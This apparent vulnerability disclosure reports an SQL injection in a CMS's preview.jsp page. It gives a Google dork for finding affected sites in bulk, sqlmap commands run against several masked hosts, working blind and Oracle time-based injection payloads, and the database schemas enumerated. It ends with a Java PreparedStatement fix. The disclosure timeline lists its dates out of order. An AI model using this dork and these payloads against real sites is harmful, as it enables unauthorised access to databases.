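2015-11-26: Details reported to the vendor; awaiting vendor handling
2015-11-30: Vendor confirmed; details disclosed to the vendor only
2015-12-03: Details opened to third-party security partners (NSFOCUS (绿盟科技), Tangchao Security Patrol (唐朝安全巡航))
2016-01-24: Details disclosed to core white hats and experts in related fields
2016-02-03: Details disclosed to regular white hats
2016-02-13: Details disclosed to trainee white hats
2015-12-17: Details disclosed to the public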
See title.
Google dork for finding instances in bulk: inurl:webapp/preview.jsp?ColumnID=
C:\Users\dark3r>sqlmap.py -u "http://**.**.**.**/cms/webapp/preview.j?ColumnID=158&TID=20130816133549129164353" --batch --dbms=oracle
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150831}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:51:31
[10:51:31] [INFO] testing connection to the target URL
[10:51:33] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ColumnID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ColumnID=158 AND 6637=6637&TID=20130816133549129164353
---
[10:51:34] [INFO] the back-end DBMS is Oracle
web application technology: Apache 2.2.22, JSP
back-end DBMS: Oracle
[10:51:35] [INFO] fetched data logged to text files under 'C:\Users\dark3r\.sqlmap\output\**.**.**.**'
[*] shutting down at 10:51:35
2.
d:\Desktop>sqlmap.py -u "http://**.**.**.**/cms/webapp/preview.jsp?ColumnID=921&TID=20151124093417625381441" --batch --dbms=oracle
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150831}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:26:03
[19:26:03] [INFO] testing connection to the target URL
[19:26:04] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: TID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ColumnID=921&TID=20151124093417625381441' AND 4096=4096 AND 'Sjmn'='Sjmn
---
[19:26:05] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[19:26:05] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'

C:\Users\dark3r>sqlmap.py -u "http://**.**.**.**/cms/webapp/preview.jsp?ColumnID=1250000790&TID=20140228062128071747515" --batch --dbms=oracle --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150514}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:50:44
[10:50:44] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ColumnID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ColumnID=1250000790 AND 8525=8525&TID=20140228062128071747515
---
[10:50:46] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
[10:50:46] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:50:46] [INFO] fetching database (schema) names
[10:50:46] [INFO] fetching number of databases
[10:50:46] [INFO] resumed: 4
[10:50:46] [INFO] resumed: SYS
[10:50:46] [INFO] resumed: SYSTEM
[10:50:46] [INFO] resumed: ZS_CMS
[10:50:46] [INFO] resumed: ZS_SCORE
available databases [4]:
[*] SYS
[*] SYSTEM
[*] ZS_CMS
[*] ZS_SCORE
[10:50:46] [INFO] fetched data logged to text files under 'C:\Users\dark3r\.sqlmap\output\**.**.**.**'

C:\Users\dark3r>sqlmap.py -u "http://**.**.**.**/bjutCms/cms/webapp/preview.jsp?ColumnID=9&TID=20150529110217599213810" --dbms=oracle --batch --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150514}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:50:52
[10:50:52] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: TID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ColumnID=9&TID=20150529110217599213810' AND 5029=5029 AND 'ZqpK'='ZqpK
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: ColumnID=9&TID=20150529110217599213810' AND 9044=DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(78)||CHR(121)||CHR(108),5) AND 'Ouqv'='Ouqv
---
[10:50:52] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:50:52] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:50:52] [INFO] fetching database (schema) names
[10:50:52] [INFO] fetching number of databases
[10:50:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:50:52] [INFO] retrieved:
[10:50:53] [WARNING] reflective value(s) found and filtering out
18
[10:50:55] [INFO] retrieved: BJUTCMS
[10:51:14] [INFO] retrieved: BJUTCMSTEST
[10:51:41] [INFO] retrieved: CTXSYS
[10:51:57] [INFO] retrieved: DBSNMP
[10:52:13] [INFO] retrieved: DMSYS
[10:52:27] [INFO] retrieved: EXFSYS
[10:52:43] [INFO] retrieved: LUNTAN
[10:52:59] [INFO] retrieved: MDSYS
[10:53:12] [INFO] retrieved: OLAPSYS
[10:53:31] [INFO] retrieved: ORDSYS
[10:53:47] [INFO] retrieved: OUTLN
[10:54:00] [INFO] retrieved: SCOTT
[10:54:14] [INFO] retrieved: SYS
[10:54:23] [INFO] retrieved: SYSMAN
[10:54:39] [INFO] retrieved: SYSTEM
[10:54:55] [INFO] retrieved: TSMSYS
[10:55:11] [INFO] retrieved: WMSYS
[10:55:25] [INFO] retrieved: XDB
available databases [18]:
[*] BJUTCMS
[*] BJUTCMSTEST
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] LUNTAN
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[10:55:34] [INFO] fetched data logged to text files under 'C:\Users\dark3r\.sqlmap\output\**.**.**.**'
Filter the parameters.
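
One way to apply the fix on the server side, as an added example that is not the vendor's code: ColumnID and TID are checked against a strict format and then passed as bind variables through a PreparedStatement rather than concatenated into the SQL text. The class name, the table and column names (CMS_ARTICLE, COLUMN_ID, TID, TITLE) and the length limits are assumptions for illustration; the page does not show the application's schema or query.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Optional;
import java.util.regex.Pattern;

// Hypothetical data-access helper for a preview.jsp-style page.
// Table and column names are assumptions, not taken from the product.
public final class PreviewDao {
    // ColumnID values in the report are short decimal numbers (158, 921, 1250000790).
    private static final Pattern COLUMN_ID = Pattern.compile("\\d{1,10}");
    // TID values in the report are 23-digit decimal strings.
    private static final Pattern TID = Pattern.compile("\\d{23}");

    private static final String SQL =
        "SELECT TITLE FROM CMS_ARTICLE WHERE COLUMN_ID = ? AND TID = ?";

    /** Accepts only plain decimal identifiers of the expected length. */
    static boolean isValid(String columnId, String tid) {
        return columnId != null && tid != null
            && COLUMN_ID.matcher(columnId).matches()
            && TID.matcher(tid).matches();
    }

    /** Returns the article title, or empty if the input is malformed or no row matches. */
    public static Optional<String> findTitle(Connection conn, String columnId, String tid)
            throws SQLException {
        if (!isValid(columnId, tid)) {
            // Input such as "158 AND 6637=6637" is rejected before any SQL runs.
            return Optional.empty();
        }
        try (PreparedStatement ps = conn.prepareStatement(SQL)) {
            // Bind variables are sent separately from the statement text, so
            // quotes or SQL keywords in a value cannot alter the query structure.
            ps.setLong(1, Long.parseLong(columnId));
            ps.setString(2, tid);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? Optional.ofNullable(rs.getString(1)) : Optional.empty();
            }
        }
    }
}
```

The format check alone would stop the payloads shown in the sqlmap output, but the bind variables are what keep the query safe if a later change loosens the validation.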
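Severity: High
Vulnerability Rank: 12
Confirmed at: 2015-11-30 11:01
CNVD confirmed and reproduced the reported issue. No direct handling channel with the software vendor has been established yet; the affected cases have been handed to CNCERT, which is notifying the relevant departments through its existing contact channels.
None yet.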